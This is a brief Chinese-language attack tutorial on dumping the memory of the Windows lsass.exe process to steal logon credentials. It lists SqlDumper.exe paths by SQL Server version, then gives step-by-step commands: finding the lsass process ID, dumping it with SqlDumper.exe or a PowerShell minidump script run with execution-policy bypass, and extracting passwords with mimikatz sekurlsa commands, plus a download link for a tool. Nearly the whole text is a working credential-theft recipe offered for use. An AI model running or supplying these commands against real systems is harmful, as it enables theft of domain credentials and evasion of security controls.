如果目標系統上安裝了sql server ,SqlDumper.exe默認存放c:\ProgramFiles\Microsoft SQL Server\number\Shared,
number對應sqlserver版本
140 for SQL Server 2017
130 for SQL Server 2016
120 for SQL Server 2014
110 for SQL Server 2012
100 for SQL Server 2008
90 for SQL Server 2005
這里域環境為2008,故SqlDumper.exe在這個位置C:\Program Files\Microsoft SQL Server\100\Shared
對比Procdump尺寸也小了許多
具體實戰:
查看lsass.exe 的ProcessID
tasklist /svc |findstr lsass.exe
根據ProcessID來dump 內存文件,Full dump file執行成功后會生產SQLDmpr0001.mdmp文件
Sqldumper.exe ProcessID 0 0x01100
mimikatz加載dump文件
sekurlsa::minidump SQLDmpr0001.mdmp
sekurlsa::logonPasswords full
地址https://mega.nz/#!9whTwbYR!1hx3IoIwNFcD9WubZcr0fYHGud0WR9QhpsS4tHsCCfw
Powershell版procdump
獲得lsass.exe的進程ID
tasklist /svc |findstr lsass.exe
dump lsass.exe進程的內存文件
powershell -exec bypass "import-module .\Get-ProcessMiniDump.ps1;Get-ProcessMiniDump -ProcID 進程 -Path C:\windows\tasks\lsass.dmp"
剩下的就是mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full